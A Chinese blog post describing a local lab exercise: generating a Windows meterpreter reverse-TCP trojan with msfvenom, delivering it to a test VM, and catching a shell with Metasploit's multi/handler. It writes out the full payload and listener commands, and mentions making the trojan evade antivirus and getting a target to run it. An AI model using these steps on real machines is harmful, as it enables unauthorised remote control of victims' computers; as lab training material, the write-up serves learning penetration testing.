利用msf入侵本地靶机

前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)
那么首先先介绍一下msf吧
Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。

IP地址

kali:192.168.83.128
靶机:192.168.83.129

step1-生成木马

今天需要使用到msfvenom来生成木马。
基础用法
-p, --payload 使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。
-f, --format 输出格式(使用 --help-formats来查看变量格式列表)
-o,–out 保存攻击负荷(payload)
在此次实验中命令为:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=4444 -f exe -o payload.exe
这里的LHOST为kali的IP,LPORT自然为kali的端口。
在这里插入图片描述
ok,生成成功。

step2-将木马传入到靶机

这一步就要靠自己的技巧了,而在这里我是在本地进行试验(ps:自行试验时目标主机必须得关闭安全防护比如防火墙,360等等,如果没关,则需要对木马进行免杀处理,木马才能成功运行)
在这里插入图片描述

step3-使用msf侦听

在这里插入图片描述
use exploit/mulit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.83.128 //kali的ip
set LPORT 4444 //kali的端口
run

step4-运行木马

这一步是通过你自己的技术,使对方运行你的木马,由于我是在本地试验,就不赘述了。

step5-获取shell

当对方成功运行木马之后,就会反弹一个shell。
在这里插入图片描述
在meterpreter后输入shell即可获取目标靶机的一个shell
(类似于cmd,可以执行系统命令)
在这里插入图片描述
本次试验到此结束,再次提醒请勿用作非法用途,如有表达不周,烦请不吝赐教。非常感谢!

发布了3 篇原创文章 · 获赞 7 · 访问量 380

猜你喜欢

转载自blog.csdn.net/gd_9988/article/details/104003536